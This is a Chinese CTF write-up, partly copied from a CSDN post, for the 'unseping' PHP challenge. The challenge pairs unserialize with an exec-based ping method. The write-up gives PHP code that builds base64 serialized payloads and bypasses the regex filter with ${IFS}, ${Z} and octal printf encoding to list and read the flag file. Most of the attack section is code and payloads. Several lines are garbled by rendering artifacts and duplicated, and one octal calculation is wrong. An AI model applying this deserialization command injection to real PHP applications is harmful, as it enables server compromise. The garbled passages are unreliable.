[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iPc18GlQ-1666931905094)(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAAAEKADAAQAAAABAAAAEAAAAAA0VXHyAAAB+ElEQVQoFS2SuY7CQBBE8XjMYXMfu6wQIgOJCAmRkBAh/pLfICABEUAIIQEJ4hL3bQ4b9rHeDtrTdk11dbWVer2uqqqiuHw+PRwOh0KhYDDo9Xpt297tdpvNZrVaHY/Hx+Pxfr+fz6d0uVw305RSGLpxN80D5e2maZplWefz2YFy5gCRrusSelsoX98/msZZut1u0FLK1+vFJ84ej0dRFErDMOLxuOQR8gdBWBYqXvSlp9P9/hfI4E0ikYjFYslkUqL7er2CAE6GiYwG0zSRQaaP7y9Ap9Pp/wun04mx+AaaQMPlcgHNzUgkggfEZwACW8bjcSaToW61WtFoNJ/Pd7vdWq3G0Aza6/WQQGdIyZJujiFIRN56vT4cDsVisdlscoC4Wq02Gg14P/bYtlgulzDRHUQul0MYJSy8J8MqhPjghKCEUYxGI6cjDnY6nUqlwh7m83kgEKAbL1kfI0GPhGw2K5kdAuxnhul0OhwOgfb7/VKpBBGS2u02ONRjrt/vVyaTyWAwgGy/3zMMZLDSnT7odByHjnUVCoVUKiW32y0/DFohoAl7BQ2CpYGmZCp2x32QaFHL5fJisWAmAm6ggFBMiQwQBAf8JbMcOZvNnGWBwwTWREa64zU6GRoc9x1vJHOwPmTgND7we7E7LsCHTtBw84+AhgJhvzqqhewBzcvrAAAAAElFTkSuQmCC)]GFSJ1061积分1金币1
18最佳Writeup由 shuita111 提供WriteUP
收藏
反馈
难度:1
方向:Web
题解数:1
解出人数:255
题目来源: 江苏工匠杯
题目描述:
unseping
题目场景:
100%
倒计时: 3时42分15秒
highlight_file(__FILE__);class ease{ private $method; private $args; function __construct($method, $args) { $this->method = $method; $this->args = $args; } function __destruct(){ if (in_array($this->method, array("ping"))) { call_user_func_array(array($this, $this->method), $this->args); } } function ping($ip){ exec($ip, $result); var_dump($result); } function waf($str){ if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) { return $str; } else { echo "don't hack"; } } function __wakeup(){ foreach($this->args as $k => $v) { $this->args[$k] = $this->waf($v); } } }$ctf=@$_POST['ctf'];@unserialize(base64_decode($ctf));?>
highlight_file(__FILE__);class ease{ private $method; private $args; function __construct($method, $args) { $this->method = $method; $this->args = $args; } function __destruct(){ if (in_array($this->method, array("ping"))) { call_user_func_array(array($this, $this->method), $this->args); } } function ping($ip){ exec($ip, $result); var_dump($result); } function waf($str){ if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) { return $str; } else { echo "don't hack"; } } function __wakeup(){ foreach($this->args as $k => $v) { $this->args[$k] = $this->waf($v); } } }// $ctf=@$_POST['ctf'];// @unserialize(base64_decode($ctf));$obj=new ease("ls","ls //");$str=serialize($obj);echo $str,PHP_EOL;$str=str_replace('O:4','O:+4',$str);$str=str_replace(':2:',':3:',$str);echo $str;echo base64_encode($str);//--------------------------------echo "";//$a=new ease("ping",array('test point'));$a= new ease("ping",array('pwd'));$b=serialize($a);echo $b;echo base64_encode($b);?>
$a = new ease("ping",array('l${Z}s'));$b=serialize($a);echo $b;echo base64_encode($b);?>//Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo2OiJsJHtafXMiO319
$a = new ease("ping",array('l${Z}s${IFS}f${Z}lag_1${Z}s_here'));$b=serialize($a);echo $b;echo base64_encode($b);//Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319
flag_1s_here/flag_831b69012c67b35f.php
访问空白!
貌似是uncode编码$(printf “\154\163”) 但是好像并不是unicode编码
\154\163怎么就能代替ls了!?
印象中“\”开头的是八进制 这会不会是assic码
\154=4+58+18^2=4+40+64=108 对应assic码”l“
\163=3+68+18^2=3+48+64=115 对应assic码”s“
根据这个思路我写了一个c语言的代码
#include int main(){ char site[] = "cat flag_1s_here/flag_831b69012c67b35f.php"; for (int i = 0; i < sizeof site / sizeof site[0]; i++) { printf("\\%o",site[i]); } return 0;}
————————————————
版权声明:本文为CSDN博主「昵称还在想呢」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/shelter1234567/article/details/127337541
#/usr/bin/python3# # char site[] = "cat flag_1s_here/flag_831b69012c67b35f.php";s="cat flag_1s_here/flag_831b69012c67b35f.php"s1=''#用于得到字符对应的ASCII码,返回值类型为int型#01-chr():功能:用于将数 (十进制数、二进制数、八进制数或十六进制数) 转化为其对应的字符。比如:for i in s: print(oct(ord(i))) s1=s1+'\\'+str(oct(ord(i)))[2:]print(s1) #运行结果┌──(kwkl㉿kwkl)-[~/HODL]└─$ /bin/python3 /home/kwkl/HODL/adworld/web/unseping/c.py0o1430o1410o1640o400o1460o1540o1410o1470o1370o610o1630o1370o1500o1450o1620o1450o570o1460o1540o1410o1470o1370o700o630o610o1420o660o710o600o610o620o1430o660o670o1420o630o650o1460o560o1600o1500o160\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160
$(printf “\154\163”)
组合一个poc:
$(printf “\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160”)
a=newease("ping",array ( ′ l a = new ease("ping",array('l a=newease("ping",array(′l{Z}s I F S f {IFS}f IFSf{Z}lag_1${Z}s_here’));
a=newease("ping",array ( ′ l a = new ease("ping",array('l a=newease("ping",array(′l{Z}s I F S f {IFS}f IFSf{Z}lag_1${Z}s_here’));
a = n e w e a s e ( " p i n g " , a r r a y (′ a = new ease("ping",array(' a=newease("ping",array(′(printf${IFS}“\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160”)'));
————————————————
版权声明:本文为CSDN博主「昵称还在想呢」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/shelter1234567/article/details/127337541
highlight_file(__FILE__);class ease{ private $method; private $args; function __construct($method, $args) { $this->method = $method; $this->args = $args; } function __destruct(){ if (in_array($this->method, array("ping"))) { call_user_func_array(array($this, $this->method), $this->args); } } function ping($ip){ exec($ip, $result); var_dump($result); } function waf($str){ if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) { return $str; } else { echo "don't hack"; } } function __wakeup(){ foreach($this->args as $k => $v) { $this->args[$k] = $this->waf($v); } } }// $ctf=@$_POST['ctf'];// @unserialize(base64_decode($ctf));$obj=new ease("ls","ls //");$str=serialize($obj);echo $str,PHP_EOL;$str=str_replace('O:4','O:+4',$str);$str=str_replace(':2:',':3:',$str);echo $str;echo base64_encode($str);//--------------------------------echo "";//$a=new ease("ping",array('test point'));//$a= new ease("ping",array('pwd'));//$a = new ease("ping",array('l${Z}s'));//$a = new ease("ping",array('l${Z}s${IFS}f${Z}lag_1${Z}s_here'));$a = new ease("ping",array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'));$b=serialize($a);echo $b;echo base64_encode($b);?>
Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319
ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319
Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoxNjk6IiQocHJpbnRmJHtJRlN9IlwxNDNcMTQxXDE2NFw0MFwxNDZcMTU0XDE0MVwxNDdcMTM3XDYxXDE2M1wxMzdcMTUwXDE0NVwxNjJcMTQ1XDU3XDE0NlwxNTRcMTQxXDE0N1wxMzdcNzBcNjNcNjFcMTQyXDY2XDcxXDYwXDYxXDYyXDE0M1w2Nlw2N1wxNDJcNjNcNjVcMTQ2XDU2XDE2MFwxNTBcMTYwIikiO319
————————————————
版权声明:本文为CSDN博主「昵称还在想呢」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/shelter1234567/article/details/127337541
————————————————
版权声明:本文为CSDN博主「昵称还在想呢」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/shelter1234567/article/details/127337541
来源地址:https://blog.csdn.net/m0_47210241/article/details/127569376